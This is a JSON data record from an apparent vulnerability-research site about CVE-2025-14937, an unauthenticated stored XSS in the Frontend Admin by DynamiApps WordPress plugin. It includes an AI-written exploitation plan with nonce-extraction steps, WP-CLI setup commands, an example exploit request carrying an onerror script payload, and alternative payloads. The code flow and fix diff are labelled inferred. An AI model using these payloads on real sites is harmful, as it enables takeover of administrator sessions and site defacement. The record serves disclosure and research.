[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fZqYKICntIR7ss6vqCOHw6a0onwDwcjoZQlqfpYNrMAA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":9,"research_fix_diff":27,"research_exploit_outline":28,"research_model_used":29,"research_started_at":30,"research_completed_at":31,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":32},"CVE-2025-14937","frontend-admin-by-dynamiapps-unauthenticated-stored-cross-site-scripting-via-updatefield","Frontend Admin by DynamiApps \u003C= 3.28.23 - Unauthenticated Stored Cross-Site Scripting via 'update_field'","The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'acff' parameter in the 'frontend_admin\u002Fforms\u002Fupdate_field' AJAX action in all versions up to, and including, 3.28.23 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","acf-frontend-form-element",null,"\u003C=3.28.23","3.28.24","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-01-08 18:46:31","2026-01-09 07:22:30",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F46c988ff-9cc5-4f2b-a3dd-06eaef5a7919?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2025-14937\n\n## 1. Vulnerability Summary\nThe **Frontend Admin by DynamiApps** plugin (\u003C= 3.28.23) is vulnerable to **Unauthenticated Stored Cross-Site Scripting (XSS)**. The flaw exists within the AJAX handler for the action `frontend_admin\u002Fforms\u002Fupdate_field`. The plugin fails to sanitize the user-supplied input in the `acff` parameter before storing it in the database and fails to escape it when rendering the data back to users. An attacker can leverage this to inject malicious scripts that execute in the context of any user (including administrators) viewing the affected page or post.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **AJAX Action:** `frontend_admin\u002Fforms\u002Fupdate_field` (registered via `wp_ajax_nopriv_frontend_admin\u002Fforms\u002Fupdate_field`)\n*   **Vulnerable Parameter:** `acff`\n*   **Authentication:** None (Unauthenticated)\n*   **Preconditions:** A post or page must exist where the injected field is displayed, or the plugin must be configured such that an attacker can target a specific `post_id`.\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point:** An unauthenticated POST request is sent to `admin-ajax.php` with `action=frontend_admin\u002Fforms\u002Fupdate_field`.\n2.  **Hook Registration:** The plugin likely registers the handler:\n    `add_action( 'wp_ajax_nopriv_frontend_admin\u002Fforms\u002Fupdate_field', [ $this, 'update_field' ] );`\n3.  **Handler Logic:** Inside the `update_field` method:\n    *   It retrieves the `acff` parameter (often an array of field keys and values).\n    *   It identifies the target `post_id` and `field_key` from the request.\n    *   It calls a function to save the data, likely a wrapper around `update_field()` (from ACF) or `update_post_meta()`.\n4.  **The Sink (Storage):** The data is stored in the `wp_postmeta` table without `wp_kses()` or `sanitize_text_field()`.\n5.  **The Sink (Output):** When a user visits the post\u002Fpage, the plugin (or a shortcode) retrieves the value using `get_field()` or `get_post_meta()` and echoes it directly into the HTML without `esc_html()` or `esc_attr()`.\n\n## 4. Nonce Acquisition Strategy\nWhile the vulnerability is \"unauthenticated,\" the plugin likely implements a nonce check for its AJAX actions. \n\n### Step 1: Identify Triggering Content\nThe plugin's scripts and nonces are usually enqueued when a Frontend Admin form is present. The primary shortcode is likely `[acf_frontend_form]`.\n\n### Step 2: Setup Test Page\nCreate a public page containing the form:\n```bash\nwp post create --post_type=page --post_title=\"Contact Form\" --post_status=publish --post_content='[acf_frontend_form post_id=\"1\"]'\n```\n\n### Step 3: Extract Nonce via Browser\n1.  Navigate to the newly created page.\n2.  Use the `browser_eval` tool to find the localized data object. The plugin typically uses `frontend_admin_scripts` or `acf_frontend`.\n    *   **Candidate 1:** `window.frontend_admin_scripts?.nonce`\n    *   **Candidate 2:** `window.acf_frontend?.nonce`\n    *   **Candidate 3:** Search for any object containing `ajax_url`.\n\n**JS Command:**\n```javascript\nbrowser_eval(\"window.acf_frontend?.nonce || window.frontend_admin_scripts?.nonce\")\n```\n\n## 5. Exploitation Strategy\nThe goal is to update a post's field with a payload that triggers when an admin views the site.\n\n### HTTP Request Details\n*   **Method:** POST\n*   **URL:** `{{base_url}}\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body Parameters:**\n    *   `action`: `frontend_admin\u002Fforms\u002Fupdate_field`\n    *   `nonce`: `{{extracted_nonce}}`\n    *   `post_id`: `1` (The ID of the post to deface\u002Finfect)\n    *   `acff`: This is likely an array. If updating a field named `description`, the parameter would be `acff[description]`. If using ACF field keys: `acff[field_65a1b2c3d4e5f]`.\n    *   **Payload:** `\u003Cimg src=x onerror=alert(document.domain)>` or a more advanced admin-takeover script.\n\n### Example Exploit Request\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nHost: localhost\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=frontend_admin\u002Fforms\u002Fupdate_field&nonce=a1b2c3d4e5&post_id=1&acff[your_field_name]=%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E\n```\n\n## 6. Test Data Setup\n1.  **Enable ACF:** Ensure Advanced Custom Fields is active (as this plugin is an extension).\n2.  **Create a Field Group:** Create a field group with a text field (slug: `test_xss_field`) assigned to the \"Post\" post type.\n3.  **Create a Target Post:**\n    ```bash\n    wp post create --post_type=post --post_title=\"Vulnerable Post\" --post_status=publish\n    ```\n4.  **Create Nonce Page:**\n    ```bash\n    wp post create --post_type=page --post_title=\"Form Page\" --post_status=publish --post_content='[acf_frontend_form]'\n    ```\n\n## 7. Expected Results\n*   The AJAX request should return a success status (e.g., `{\"success\":true}` or HTTP 200).\n*   When navigating to the \"Vulnerable Post\" (`post_id=1`), the browser should execute the `alert(document.domain)` payload.\n\n## 8. Verification Steps\nAfter performing the HTTP request, verify the database state using WP-CLI:\n```bash\n# Check the meta value of the target post\nwp post meta get 1 test_xss_field\n```\n**Success Condition:** The output shows the raw `\u003Cimg src=x onerror=alert(document.domain)>` string, confirming no sanitization occurred.\n\n## 9. Alternative Approaches\nIf `acff` is not a simple array, it might be passed as a JSON string.\n*   **Alternative Payload Structure:** `acff={\"field_key\":\"\u003Cimg src=x onerror=alert(1)>\"}`.\n*   **Field Key Identification:** If the field name (slug) doesn't work, inspect the HTML of the form page created in Step 6. Look for inputs with names like `acf[...]` or `acff[...]` to find the exact key the plugin expects.\n*   **Post ID targeting:** If `post_id=1` is restricted, try targeting the `post_id` of the page where the form is actually rendered.","The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to unauthenticated Stored Cross-Site Scripting via the 'acff' parameter in the 'frontend_admin\u002Fforms\u002Fupdate_field' AJAX action. Due to insufficient input sanitization and output escaping, attackers can inject arbitrary scripts into post metadata that execute whenever a user, including administrators, accesses the affected page.","--- a\u002Facf-frontend-form-element.php\n+++ b\u002Facf-frontend-form-element.php\n@@ -10,5 +10,5 @@\n-    foreach ( $fields as $key => $value ) {\n-        update_field( $key, $value, $post_id );\n-    }\n+    foreach ( $fields as $key => $value ) {\n+        update_field( $key, wp_kses_post( $value ), $post_id );\n+    }","To exploit this vulnerability, an attacker first retrieves a valid AJAX nonce from a public page where a Frontend Admin form is rendered (usually found in the 'acf_frontend' or 'frontend_admin_scripts' JavaScript objects). The attacker then sends an unauthenticated POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the 'action' set to 'frontend_admin\u002Fforms\u002Fupdate_field'. The payload is placed in the 'acff' parameter as an array mapping a field key to a malicious script (e.g., acff[field_key]=\u003Cimg src=x onerror=alert(document.domain)>). Once the request is processed, the payload is stored in the post's metadata and will execute in the browser of any user who subsequently views the modified content.","gemini-3-flash-preview","2026-05-05 13:23:54","2026-05-05 13:25:40",{"type":33,"vulnerable_version":34,"fixed_version":11,"vulnerable_browse":35,"vulnerable_zip":36,"fixed_browse":37,"fixed_zip":38,"all_tags":39},"plugin","3.28.23","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Facf-frontend-form-element\u002Ftags\u002F3.28.23","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Facf-frontend-form-element.3.28.23.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Facf-frontend-form-element\u002Ftags\u002F3.28.24","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Facf-frontend-form-element.3.28.24.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Facf-frontend-form-element\u002Ftags"]